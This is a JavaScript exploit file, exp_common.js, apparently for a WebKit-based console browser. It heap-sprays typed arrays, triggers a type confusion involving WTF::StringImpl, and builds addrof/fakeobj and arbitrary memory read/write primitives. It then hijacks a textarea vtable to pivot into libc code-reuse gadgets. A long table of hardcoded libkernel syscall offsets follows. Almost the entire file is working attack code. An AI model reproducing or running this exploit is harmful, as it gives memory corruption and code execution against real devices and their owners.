-
Notifications
You must be signed in to change notification settings - Fork 69
/
exp_common.js
844 lines (833 loc) · 31.3 KB
/
exp_common.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
//for addrof&fakeobj
var leaker_obj = {a: 0};
var leaker_arr = new Uint32Array(6);
//for arbitrary r/w
var oob_slave = new Uint8Array(1024);
var oob_master = new Uint32Array(7);
var spray = [];
function spray_one()
{
var x = new Uint32Array(1);
x[spray.length+'spray'] = 123;
spray.push(x);
}
//spray Uint32Arrays
for(var i = 0; i < 0x10000; i++)
spray_one();
//5678 is the length, see the original exploit for explanation of a
var target = {a: 2.1100820415101592e-303, b: false, c: true, d: 5678};
//crash if this second target is not present. not used anywhere, try removing if it crashes
var target2 = {a: 2.1100820415101592e-303, b: false, c: true, e: 5678};
var impl_idx = 0;
//type-confused with WTF::StringImpl
function create_impl()
{
var ans = {a: target}; //a is type-confused with m_hashAndFlags
for(var i = 0; i < 32; i++)
ans[(impl_idx++)+'x'] = {};
return ans;
}
function trigger(x)
{
if(impl.a != target)
{
print("wtf?");
while(1);
}
var o = {a: 1}; //a is type-confused with m_impl
for(var i in o)
{
{
i = x;
function i(){}
}
o[i]; //this sets bit 4 (|= 16) in m_hashAndFlags
}
if(impl.a != target)
{
print("corrupted!");
print(typeof (impl.a)); //object
print(impl.a.length); //5678
target.c = leaker_obj;
leaker_obj.a = leaker_obj;
var l1 = impl.a[4];
var l2 = impl.a[5];
leaker_obj.a = oob_slave;
var s1 = impl.a[4];
var s2 = impl.a[5];
target.c = leaker_arr;
impl.a[4] = l1;
impl.a[5] = l2;
target.c = oob_master;
impl.a[4] = s1;
impl.a[5] = s2;
impl.a = target;
print([l1, l2, s1, s2]);
throw "exploit fucking finished";
}
}
try
{
for(var _ = 0; _ < 1024; _++)
{
var impl = create_impl(); //JSString::toIdentifier checks some bits in the type-confused structure ID, so iterate over those
var s = {a: impl};
trigger(s);
}
}
catch(e)
{
print("error: "+e);
}
function i48_put(x, a) {
a[4] = x | 0;
a[5] = (x / 4294967296) | 0;
}
function i48_get(a) {
return a[4] + a[5] * 4294967296;
}
function addrof(x) {
leaker_obj.a = x;
return i48_get(leaker_arr);
}
function fakeobj(x) {
i48_put(x, leaker_arr);
return leaker_obj.a;
}
function read_mem_setup(p, sz) {
i48_put(p, oob_master);
oob_master[6] = sz;
}
function read_mem(p, sz) {
read_mem_setup(p, sz);
var arr = [];
for (var i = 0; i < sz; i++)
arr.push(oob_slave[i]);
return arr;
}
function read_mem_s(p, sz) {
read_mem_setup(p, sz);
return "" + oob_slave;
}
function read_mem_b(p, sz) {
read_mem_setup(p, sz);
var b = new Uint8Array(sz);
b.set(oob_slave);
return b;
}
function read_mem_as_string(p, sz) {
var x = read_mem_b(p, sz);
var ans = '';
for (var i = 0; i < x.length; i++)
ans += String.fromCharCode(x[i]);
return ans;
}
function write_mem(p, data) {
i48_put(p, oob_master);
oob_master[6] = data.length;
for (var i = 0; i < data.length; i++)
oob_slave[i] = data[i];
}
function read_ptr_at(p) {
var ans = 0;
var d = read_mem(p, 8);
for (var i = 7; i >= 0; i--)
ans = 256 * ans + d[i];
return ans;
}
function write_ptr_at(p, d) {
var arr = [];
for (var i = 0; i < 8; i++) {
arr.push(d & 0xff);
d /= 256;
}
write_mem(p, arr);
}
function hex(x) {
return (new Number(x)).toString(16);
}
var malloc_nogc = [];
function malloc(sz) {
var arr = new Uint8Array(sz);
malloc_nogc.push(arr);
return read_ptr_at(addrof(arr) + 0x10);
}
var tarea = document.createElement('textarea');
var real_vt_ptr = read_ptr_at(addrof(tarea) + 0x18);
var fake_vt_ptr = malloc(0x400);
write_mem(fake_vt_ptr, read_mem(real_vt_ptr, 0x400));
write_ptr_at(addrof(tarea) + 0x18, fake_vt_ptr);
var real_vtable = read_ptr_at(fake_vt_ptr);
var fake_vtable = malloc(0x2000);
write_mem(fake_vtable, read_mem(real_vtable, 0x2000));
write_ptr_at(fake_vt_ptr, fake_vtable);
var fake_vt_ptr_bak = malloc(0x400);
write_mem(fake_vt_ptr_bak, read_mem(fake_vt_ptr, 0x400));
var plt_ptr = read_ptr_at(fake_vtable) - 10063176;
function get_got_addr(idx) {
var p = plt_ptr + idx * 16;
var q = read_mem(p, 6);
if (q[0] != 0xff || q[1] != 0x25)
throw "invalid GOT entry";
var offset = 0;
for (var i = 5; i >= 2; i--)
offset = offset * 256 + q[i];
offset += p + 6;
return read_ptr_at(offset);
}
var webkit_base = read_ptr_at(fake_vtable);
var libkernel_base = get_got_addr(705) - 0x10000;
var libc_base = get_got_addr(582);
var saveall_addr = libc_base + 0x2e2c8;
var loadall_addr = libc_base + 0x3275c;
var setjmp_addr = libc_base + 0xbfae0;
var longjmp_addr = libc_base + 0xbfb30;
var pivot_addr = libc_base + 0x327d2;
var infloop_addr = libc_base + 0x447a0;
var jop_frame_addr = libc_base + 0x715d0;
var get_errno_addr_addr = libkernel_base + 0x9ff0;
var pthread_create_addr = libkernel_base + 0xf980;
function saveall() {
var ans = malloc(0x800);
var bak = read_ptr_at(fake_vtable + 0x1d8);
write_ptr_at(fake_vtable + 0x1d8, saveall_addr);
tarea.scrollLeft = 0;
write_mem(ans, read_mem(fake_vt_ptr, 0x400));
write_mem(fake_vt_ptr, read_mem(fake_vt_ptr_bak, 0x400));
var bak = read_ptr_at(fake_vtable + 0x1d8);
write_ptr_at(fake_vtable + 0x1d8, saveall_addr);
write_ptr_at(fake_vt_ptr + 0x38, 0x1234);
tarea.scrollLeft = 0;
write_mem(ans + 0x400, read_mem(fake_vt_ptr, 0x400));
write_mem(fake_vt_ptr, read_mem(fake_vt_ptr_bak, 0x400));
return ans;
}
function pivot(buf) {
var ans = malloc(0x400);
var bak = read_ptr_at(fake_vtable + 0x1d8);
write_ptr_at(fake_vtable + 0x1d8, saveall_addr);
tarea.scrollLeft = 0;
write_mem(ans, read_mem(fake_vt_ptr, 0x400));
write_mem(fake_vt_ptr, read_mem(fake_vt_ptr_bak, 0x400));
var bak = read_ptr_at(fake_vtable + 0x1d8);
write_ptr_at(fake_vtable + 0x1d8, pivot_addr);
write_ptr_at(fake_vt_ptr + 0x38, buf);
write_ptr_at(ans + 0x38, read_ptr_at(ans + 0x38) - 16);
write_ptr_at(buf, ans);
tarea.scrollLeft = 0;
write_mem(fake_vt_ptr, read_mem(fake_vt_ptr_bak, 0x400));
}
var sys_670_addr = libkernel_base + 0x1efc0;
var sys_192_addr = libkernel_base + 0x1efe0;
var sys_586_addr = libkernel_base + 0x1f000;
var sys_545_addr = libkernel_base + 0x1f020;
var sys_362_addr = libkernel_base + 0x1f040;
var sys_363_addr = libkernel_base + 0x1f060;
var sys_206_addr = libkernel_base + 0x1f080;
var sys_5_addr = libkernel_base + 0x1f0a0;
var sys_432_addr = libkernel_base + 0x1f0c0;
var sys_136_addr = libkernel_base + 0x1f0e0;
var sys_42_addr = libkernel_base + 0x1f100;
var sys_188_addr = libkernel_base + 0x1f130;
var sys_4_addr = libkernel_base + 0x1f150;
var sys_546_addr = libkernel_base + 0x1f170;
var sys_236_addr = libkernel_base + 0x1f190;
var sys_127_addr = libkernel_base + 0x1f1b0;
var sys_533_addr = libkernel_base + 0x1f1d0;
var sys_429_addr = libkernel_base + 0x1f1f0;
var sys_658_addr = libkernel_base + 0x1f210;
var sys_345_addr = libkernel_base + 0x1f230;
var sys_623_addr = libkernel_base + 0x1f250;
var sys_329_addr = libkernel_base + 0x1f270;
var sys_551_addr = libkernel_base + 0x1f290;
var sys_593_addr = libkernel_base + 0x1f2b0;
var sys_555_addr = libkernel_base + 0x1f2e0;
var sys_673_addr = libkernel_base + 0x1f300;
var sys_253_addr = libkernel_base + 0x1f320;
var sys_272_addr = libkernel_base + 0x1f340;
var sys_466_addr = libkernel_base + 0x1f360;
var sys_539_addr = libkernel_base + 0x1f380;
var sys_454_addr = libkernel_base + 0x1f3a0;
var sys_33_addr = libkernel_base + 0x1f3c0;
var sys_55_addr = libkernel_base + 0x1f3e0;
var sys_53_addr = libkernel_base + 0x1f400;
var sys_421_addr = libkernel_base + 0x1f424;
var sys_73_addr = libkernel_base + 0x1f450;
var sys_23_addr = libkernel_base + 0x1f470;
var sys_543_addr = libkernel_base + 0x1f490;
var sys_422_addr = libkernel_base + 0x1f4b0;
var sys_592_addr = libkernel_base + 0x1f4d0;
var sys_147_addr = libkernel_base + 0x1f4f0;
var sys_397_addr = libkernel_base + 0x1f510;
var sys_663_addr = libkernel_base + 0x1f530;
var sys_30_addr = libkernel_base + 0x1f550;
var sys_637_addr = libkernel_base + 0x1f570;
var sys_616_addr = libkernel_base + 0x1f590;
var sys_671_addr = libkernel_base + 0x1f5b0;
var sys_341_addr = libkernel_base + 0x1f5d0;
var sys_479_addr = libkernel_base + 0x1f5f0;
var sys_95_addr = libkernel_base + 0x1f610;
var sys_59_addr = libkernel_base + 0x1f63d;
var sys_540_addr = libkernel_base + 0x1f660;
var sys_101_addr = libkernel_base + 0x1f680;
var sys_655_addr = libkernel_base + 0x1f6a0;
var sys_549_addr = libkernel_base + 0x1f6c0;
var sys_49_addr = libkernel_base + 0x1f6e0;
var sys_78_addr = libkernel_base + 0x1f700;
var sys_134_addr = libkernel_base + 0x1f720;
var sys_44_addr = libkernel_base + 0x1f740;
var sys_289_addr = libkernel_base + 0x1f760;
var sys_25_addr = libkernel_base + 0x1f780;
var sys_643_addr = libkernel_base + 0x1f7a0;
var sys_456_addr = libkernel_base + 0x1f7c0;
var sys_664_addr = libkernel_base + 0x1f7e0;
var sys_607_addr = libkernel_base + 0x1f800;
var sys_563_addr = libkernel_base + 0x1f820;
var sys_662_addr = libkernel_base + 0x1f840;
var sys_251_addr = libkernel_base + 0x1f869;
var sys_1_addr = libkernel_base + 0x1f88a;
var sys_657_addr = libkernel_base + 0x1f8b0;
var sys_343_addr = libkernel_base + 0x1f8d0;
var sys_238_addr = libkernel_base + 0x1f8f0;
var sys_566_addr = libkernel_base + 0x1f910;
var sys_402_addr = libkernel_base + 0x1f930;
var sys_328_addr = libkernel_base + 0x1f950;
var sys_423_addr = libkernel_base + 0x1f970;
var sys_567_addr = libkernel_base + 0x1f990;
var sys_610_addr = libkernel_base + 0x1f9b0;
var sys_65_addr = libkernel_base + 0x1f9d0;
var sys_346_addr = libkernel_base + 0x1f9f0;
var sys_190_addr = libkernel_base + 0x1fa10;
var sys_619_addr = libkernel_base + 0x1fa30;
var sys_538_addr = libkernel_base + 0x1fa50;
var sys_75_addr = libkernel_base + 0x1fa70;
var sys_487_addr = libkernel_base + 0x1fa90;
var sys_544_addr = libkernel_base + 0x1fab0;
var sys_50_addr = libkernel_base + 0x1fad0;
var sys_404_addr = libkernel_base + 0x1fb00;
var sys_564_addr = libkernel_base + 0x1fb20;
var sys_558_addr = libkernel_base + 0x1fb40;
var sys_116_addr = libkernel_base + 0x1fb60;
var sys_3_addr = libkernel_base + 0x1fb80;
var sys_634_addr = libkernel_base + 0x1fba0;
var sys_548_addr = libkernel_base + 0x1fbc0;
var sys_165_addr = libkernel_base + 0x1fbe0;
var sys_638_addr = libkernel_base + 0x1fc00;
var sys_541_addr = libkernel_base + 0x1fc20;
var sys_195_addr = libkernel_base + 0x1fc40;
var sys_31_addr = libkernel_base + 0x1fc60;
var sys_665_addr = libkernel_base + 0x1fc80;
var sys_478_addr = libkernel_base + 0x1fca0;
var sys_98_addr = libkernel_base + 0x1fcc0;
var sys_29_addr = libkernel_base + 0x1fce0;
var sys_194_addr = libkernel_base + 0x1fd00;
var sys_656_addr = libkernel_base + 0x1fd20;
var sys_632_addr = libkernel_base + 0x1fd40;
var sys_454_addr = libkernel_base + 0x1fd60;
var sys_37_addr = libkernel_base + 0x1fd70;
var sys_599_addr = libkernel_base + 0x1fd90;
var sys_32_addr = libkernel_base + 0x1fdb0;
var sys_554_addr = libkernel_base + 0x1fdd0;
var sys_59_addr = libkernel_base + 0x1fdf0;
var sys_131_addr = libkernel_base + 0x1fe10;
var sys_417_addr = libkernel_base + 0x1fe30;
var sys_547_addr = libkernel_base + 0x1fe50;
var sys_476_addr = libkernel_base + 0x1fe70;
var sys_642_addr = libkernel_base + 0x1fe90;
var sys_407_addr = libkernel_base + 0x1feb0;
var sys_393_addr = libkernel_base + 0x1fed0;
var sys_113_addr = libkernel_base + 0x1fef0;
var sys_10_addr = libkernel_base + 0x1ff10;
var sys_633_addr = libkernel_base + 0x1ff30;
var sys_535_addr = libkernel_base + 0x1ff50;
var sys_488_addr = libkernel_base + 0x1ff70;
var sys_232_addr = libkernel_base + 0x1ff90;
var sys_481_addr = libkernel_base + 0x1ffb0;
var sys_636_addr = libkernel_base + 0x1ffd0;
var sys_93_addr = libkernel_base + 0x1fff0;
var sys_522_addr = libkernel_base + 0x20010;
var sys_36_addr = libkernel_base + 0x20030;
var sys_135_addr = libkernel_base + 0x20050;
var sys_646_addr = libkernel_base + 0x20070;
var sys_674_addr = libkernel_base + 0x20090;
var sys_629_addr = libkernel_base + 0x200b0;
var sys_24_addr = libkernel_base + 0x200d0;
var sys_56_addr = libkernel_base + 0x200f0;
var sys_340_addr = libkernel_base + 0x20113;
var sys_182_addr = libkernel_base + 0x201a0;
var sys_486_addr = libkernel_base + 0x201c0;
var sys_542_addr = libkernel_base + 0x201e0;
var sys_332_addr = libkernel_base + 0x20200;
var sys_416_addr = libkernel_base + 0x20220;
var sys_622_addr = libkernel_base + 0x20240;
var sys_669_addr = libkernel_base + 0x20260;
var sys_620_addr = libkernel_base + 0x20280;
var sys_122_addr = libkernel_base + 0x202a0;
var sys_27_addr = libkernel_base + 0x202c0;
var sys_661_addr = libkernel_base + 0x202e0;
var sys_80_addr = libkernel_base + 0x20300;
var sys_666_addr = libkernel_base + 0x20320;
var sys_240_addr = libkernel_base + 0x20340;
var sys_654_addr = libkernel_base + 0x20360;
var sys_430_addr = libkernel_base + 0x20380;
var sys_325_addr = libkernel_base + 0x203a0;
var sys_608_addr = libkernel_base + 0x203c0;
var sys_290_addr = libkernel_base + 0x203e0;
var sys_588_addr = libkernel_base + 0x20400;
var sys_532_addr = libkernel_base + 0x20420;
var sys_79_addr = libkernel_base + 0x20440;
var sys_552_addr = libkernel_base + 0x20460;
var sys_550_addr = libkernel_base + 0x20480;
var sys_649_addr = libkernel_base + 0x204a0;
var sys_560_addr = libkernel_base + 0x204c0;
var sys_628_addr = libkernel_base + 0x204e0;
var sys_444_addr = libkernel_base + 0x20500;
var sys_74_addr = libkernel_base + 0x20520;
var sys_403_addr = libkernel_base + 0x205f0;
var sys_400_addr = libkernel_base + 0x20610;
var sys_334_addr = libkernel_base + 0x20630;
var sys_86_addr = libkernel_base + 0x20650;
var sys_20_addr = libkernel_base + 0x20670;
var sys_102_addr = libkernel_base + 0x20690;
var sys_627_addr = libkernel_base + 0x206b0;
var sys_581_addr = libkernel_base + 0x206d0;
var sys_602_addr = libkernel_base + 0x206f0;
var sys_534_addr = libkernel_base + 0x20710;
var sys_183_addr = libkernel_base + 0x20730;
var sys_640_addr = libkernel_base + 0x20750;
var sys_234_addr = libkernel_base + 0x20770;
var sys_83_addr = libkernel_base + 0x20790;
var sys_431_addr = libkernel_base + 0x207b0;
var sys_600_addr = libkernel_base + 0x207d0;
var sys_433_addr = libkernel_base + 0x207f0;
var sys_1_addr = libkernel_base + 0x20810;
var sys_90_addr = libkernel_base + 0x20830;
var sys_138_addr = libkernel_base + 0x20850;
var sys_475_addr = libkernel_base + 0x20870;
var sys_536_addr = libkernel_base + 0x20890;
var sys_237_addr = libkernel_base + 0x208b0;
var sys_327_addr = libkernel_base + 0x208d0;
var sys_668_addr = libkernel_base + 0x208f0;
var sys_553_addr = libkernel_base + 0x20910;
var sys_672_addr = libkernel_base + 0x20930;
var sys_612_addr = libkernel_base + 0x20950;
var sys_47_addr = libkernel_base + 0x20970;
var sys_189_addr = libkernel_base + 0x20990;
var sys_2_addr = libkernel_base + 0x209b0;
var sys_557_addr = libkernel_base + 0x209d0;
var sys_565_addr = libkernel_base + 0x209f0;
var sys_613_addr = libkernel_base + 0x20a10;
var sys_196_addr = libkernel_base + 0x20a30;
var sys_117_addr = libkernel_base + 0x20a50;
var sys_126_addr = libkernel_base + 0x20a70;
var sys_7_addr = libkernel_base + 0x20a90;
var sys_202_addr = libkernel_base + 0x20ab0;
var sys_104_addr = libkernel_base + 0x20ad0;
var sys_331_addr = libkernel_base + 0x20af0;
var sys_604_addr = libkernel_base + 0x20b10;
var sys_615_addr = libkernel_base + 0x20b30;
var sys_105_addr = libkernel_base + 0x20b50;
var sys_594_addr = libkernel_base + 0x20b70;
var sys_100_addr = libkernel_base + 0x20b90;
var sys_677_addr = libkernel_base + 0x20bb0;
var sys_625_addr = libkernel_base + 0x20bd0;
var sys_596_addr = libkernel_base + 0x20bf0;
var sys_99_addr = libkernel_base + 0x20c10;
var sys_401_addr = libkernel_base + 0x20c30;
var sys_125_addr = libkernel_base + 0x20c50;
var sys_15_addr = libkernel_base + 0x20c70;
var sys_315_addr = libkernel_base + 0x20c90;
var sys_441_addr = libkernel_base + 0x20cb0;
var sys_591_addr = libkernel_base + 0x20cd0;
var sys_618_addr = libkernel_base + 0x20cf0;
var sys_556_addr = libkernel_base + 0x20d10;
var sys_121_addr = libkernel_base + 0x20d30;
var sys_239_addr = libkernel_base + 0x20d50;
var sys_137_addr = libkernel_base + 0x20d70;
var sys_333_addr = libkernel_base + 0x20d90;
var sys_595_addr = libkernel_base + 0x20db0;
var sys_464_addr = libkernel_base + 0x20dd0;
var sys_324_addr = libkernel_base + 0x20df0;
var sys_499_addr = libkernel_base + 0x20e10;
var sys_583_addr = libkernel_base + 0x20e30;
var sys_340_addr = libkernel_base + 0x20e50;
var sys_12_addr = libkernel_base + 0x20e70;
var sys_630_addr = libkernel_base + 0x20e90;
var sys_379_addr = libkernel_base + 0x20eb0;
var sys_443_addr = libkernel_base + 0x20ed0;
var sys_653_addr = libkernel_base + 0x20ef0;
var sys_455_addr = libkernel_base + 0x20f10;
var sys_204_addr = libkernel_base + 0x20f30;
var sys_35_addr = libkernel_base + 0x20f50;
var sys_480_addr = libkernel_base + 0x20f70;
var sys_128_addr = libkernel_base + 0x20f90;
var sys_209_addr = libkernel_base + 0x20fb0;
var sys_582_addr = libkernel_base + 0x20fd0;
var sys_310_addr = libkernel_base + 0x20ff0;
var sys_572_addr = libkernel_base + 0x21010;
var sys_124_addr = libkernel_base + 0x21030;
var sys_435_addr = libkernel_base + 0x21050;
var sys_477_addr = libkernel_base + 0x21070;
var sys_235_addr = libkernel_base + 0x21090;
var sys_41_addr = libkernel_base + 0x210b0;
var sys_28_addr = libkernel_base + 0x210d0;
var sys_6_addr = libkernel_base + 0x210f0;
var sys_606_addr = libkernel_base + 0x21110;
var sys_43_addr = libkernel_base + 0x21130;
var sys_624_addr = libkernel_base + 0x21150;
var sys_598_addr = libkernel_base + 0x21170;
var sys_92_addr = libkernel_base + 0x21190;
var sys_39_addr = libkernel_base + 0x211b0;
var sys_120_addr = libkernel_base + 0x211d0;
var sys_603_addr = libkernel_base + 0x211f0;
var sys_106_addr = libkernel_base + 0x21210;
var sys_648_addr = libkernel_base + 0x21230;
var sys_617_addr = libkernel_base + 0x21250;
var sys_406_addr = libkernel_base + 0x21270;
var sys_641_addr = libkernel_base + 0x21290;
var sys_483_addr = libkernel_base + 0x212b0;
var sys_675_addr = libkernel_base + 0x212d0;
var sys_660_addr = libkernel_base + 0x212f0;
var sys_203_addr = libkernel_base + 0x21310;
var sys_605_addr = libkernel_base + 0x21330;
var sys_647_addr = libkernel_base + 0x21350;
var sys_233_addr = libkernel_base + 0x21370;
var sys_408_addr = libkernel_base + 0x21390;
var sys_405_addr = libkernel_base + 0x213b0;
var sys_635_addr = libkernel_base + 0x213d0;
var sys_667_addr = libkernel_base + 0x213f0;
var sys_89_addr = libkernel_base + 0x21410;
var sys_34_addr = libkernel_base + 0x21430;
var sys_482_addr = libkernel_base + 0x21450;
var sys_584_addr = libkernel_base + 0x21470;
var sys_659_addr = libkernel_base + 0x21490;
var sys_114_addr = libkernel_base + 0x214b0;
var sys_330_addr = libkernel_base + 0x214d0;
var sys_191_addr = libkernel_base + 0x214f0;
var sys_639_addr = libkernel_base + 0x21510;
var sys_96_addr = libkernel_base + 0x21530;
var sys_676_addr = libkernel_base + 0x21550;
var sys_652_addr = libkernel_base + 0x21570;
var sys_54_addr = libkernel_base + 0x21590;
var sys_626_addr = libkernel_base + 0x215b0;
var sys_580_addr = libkernel_base + 0x215d0;
var sys_97_addr = libkernel_base + 0x215f0;
var sys_434_addr = libkernel_base + 0x21610;
var sys_442_addr = libkernel_base + 0x21630;
var sys_585_addr = libkernel_base + 0x21650;
var sys_587_addr = libkernel_base + 0x21670;
var sys_601_addr = libkernel_base + 0x21690;
var sys_118_addr = libkernel_base + 0x216b0;
var sys_611_addr = libkernel_base + 0x216d0;
var sys_140_addr = libkernel_base + 0x216f0;
var sys_141_addr = libkernel_base + 0x21710;
var sys_392_addr = libkernel_base + 0x21730;
var sys_559_addr = libkernel_base + 0x21750;
var sys_133_addr = libkernel_base + 0x21770;
var aio_init_addr = sys_670_addr;
var fpathconf_addr = sys_192_addr;
var dmem_container_addr = sys_586_addr;
var evf_clear_addr = sys_545_addr;
var kqueue_addr = sys_362_addr;
var kevent_addr = sys_363_addr;
var futimes_addr = sys_206_addr;
var open_addr = sys_5_addr;
var thr_self_addr = sys_432_addr;
var mkdir_addr = sys_136_addr;
var pipe_addr = sys_42_addr;
var stat_addr = sys_188_addr;
var write_addr = sys_4_addr;
var evf_cancel_addr = sys_546_addr;
var ktimer_delete_addr = sys_236_addr;
var setregid_addr = sys_127_addr;
var jitshm_create_addr = sys_533_addr;
var sigwait_addr = sys_429_addr;
var fdatasync_addr = sys_658_addr;
var sigtimedwait_addr = sys_345_addr;
var get_gpo_addr = sys_623_addr;
var sched_setscheduler_addr = sys_329_addr;
var osem_open_addr = sys_551_addr;
var dynlib_get_info_addr = sys_593_addr;
var osem_post_addr = sys_555_addr;
var blockpool_move_addr = sys_673_addr;
var issetugid_addr = sys_253_addr;
var getdents_addr = sys_272_addr;
var rtprio_thread_addr = sys_466_addr;
var evf_delete_addr = sys_539_addr;
var _umtx_op_addr = sys_454_addr;
var access_addr = sys_33_addr;
var reboot_addr = sys_55_addr;
var sigaltstack_addr = sys_53_addr;
var getcontext_addr = sys_421_addr;
var munmap_addr = sys_73_addr;
var setuid_addr = sys_23_addr;
var evf_trywait_addr = sys_543_addr;
var setcontext_addr = sys_422_addr;
var dynlib_get_list_addr = sys_592_addr;
var setsid_addr = sys_147_addr;
var fstatfs_addr = sys_397_addr;
var aio_multi_wait_addr = sys_663_addr;
var accept_addr = sys_30_addr;
var set_phys_fmem_limit_addr = sys_637_addr;
var thr_get_name_addr = sys_616_addr;
var get_page_table_stats_addr = sys_671_addr;
var sigsuspend_addr = sys_341_addr;
var truncate_addr = sys_479_addr;
var fsync_addr = sys_95_addr;
var execve_addr = sys_59_addr;
var evf_open_addr = sys_540_addr;
var netabort_addr = sys_101_addr;
var blockpool_unmap_addr = sys_655_addr;
var osem_create_addr = sys_549_addr;
var getlogin_addr = sys_49_addr;
var mincore_addr = sys_78_addr;
var shutdown_addr = sys_134_addr;
var profil_addr = sys_44_addr;
var preadv_addr = sys_289_addr;
var geteuid_addr = sys_25_addr;
var set_chicken_switches_addr = sys_643_addr;
var sigqueue_addr = sys_456_addr;
var aio_multi_poll_addr = sys_664_addr;
var get_self_auth_info_addr = sys_607_addr;
var opmc_enable_addr = sys_563_addr;
var aio_multi_delete_addr = sys_662_addr;
var rfork_addr = sys_251_addr;
var sys_exit_addr = sys_1_addr;
var blockpool_batch_addr = sys_657_addr;
var sigpending_addr = sys_343_addr;
var ktimer_gettime_addr = sys_238_addr;
var opmc_set_ctr_addr = sys_566_addr;
var ksem_wait_addr = sys_402_addr;
var sched_getparam_addr = sys_328_addr;
var swapcontext_addr = sys_423_addr;
var opmc_get_ctr_addr = sys_567_addr;
var budget_get_ptype_addr = sys_610_addr;
var msync_addr = sys_65_addr;
var sigwaitinfo_addr = sys_346_addr;
var lstat_addr = sys_190_addr;
var test_debug_rwmem_addr = sys_619_addr;
var evf_create_addr = sys_538_addr;
var madvise_addr = sys_75_addr;
var cpuset_getaffinity_addr = sys_487_addr;
var evf_set_addr = sys_544_addr;
var setlogin_addr = sys_50_addr;
var ksem_init_addr = sys_404_addr;
var opmc_disable_addr = sys_564_addr;
var namedobj_delete_addr = sys_558_addr;
var gettimeofday_addr = sys_116_addr;
var read_addr = sys_3_addr;
var thr_get_ucontext_addr = sys_634_addr;
var batch_map_addr = sys_548_addr;
var sysarch_addr = sys_165_addr;
var utc_to_localtime_addr = sys_638_addr;
var evf_close_addr = sys_541_addr;
var setrlimit_addr = sys_195_addr;
var getpeername_addr = sys_31_addr;
var aio_get_data_addr = sys_665_addr;
var lseek_addr = sys_478_addr;
var connect_addr = sys_98_addr;
var recvfrom_addr = sys_29_addr;
var getrlimit_addr = sys_194_addr;
var dynlib_get_info_for_libdbg_addr = sys_656_addr;
var thr_suspend_ucontext_addr = sys_632_addr;
var _umtx_op_addr = sys_454_addr;
var kill_addr = sys_37_addr;
var dynlib_process_needed_and_relocate_addr = sys_599_addr;
var getsockname_addr = sys_32_addr;
var osem_trywait_addr = sys_554_addr;
var execve_addr = sys_59_addr;
var flock_addr = sys_131_addr;
var sigreturn_addr = sys_417_addr;
var query_memory_protection_addr = sys_547_addr;
var pwrite_addr = sys_476_addr;
var get_map_statistics_addr = sys_642_addr;
var ksem_getvalue_addr = sys_407_addr;
var sendfile_addr = sys_393_addr;
var socketex_addr = sys_113_addr;
var unlink_addr = sys_10_addr;
var thr_resume_ucontext_addr = sys_633_addr;
var dl_get_list_addr = sys_535_addr;
var cpuset_setaffinity_addr = sys_488_addr;
var clock_gettime_addr = sys_232_addr;
var thr_kill2_addr = sys_481_addr;
var set_timezone_info_addr = sys_636_addr;
var select_addr = sys_93_addr;
var pselect_addr = sys_522_addr;
var sync_addr = sys_36_addr;
var socketpair_addr = sys_135_addr;
var get_kernel_mem_statistics_addr = sys_646_addr;
var virtual_query_all_addr = sys_674_addr;
var physhm_open_addr = sys_629_addr;
var getuid_addr = sys_24_addr;
var revoke_addr = sys_56_addr;
var sigprocmask_addr = sys_340_addr;
var setegid_addr = sys_182_addr;
var cpuset_getid_addr = sys_486_addr;
var evf_wait_addr = sys_542_addr;
var sched_get_priority_max_addr = sys_332_addr;
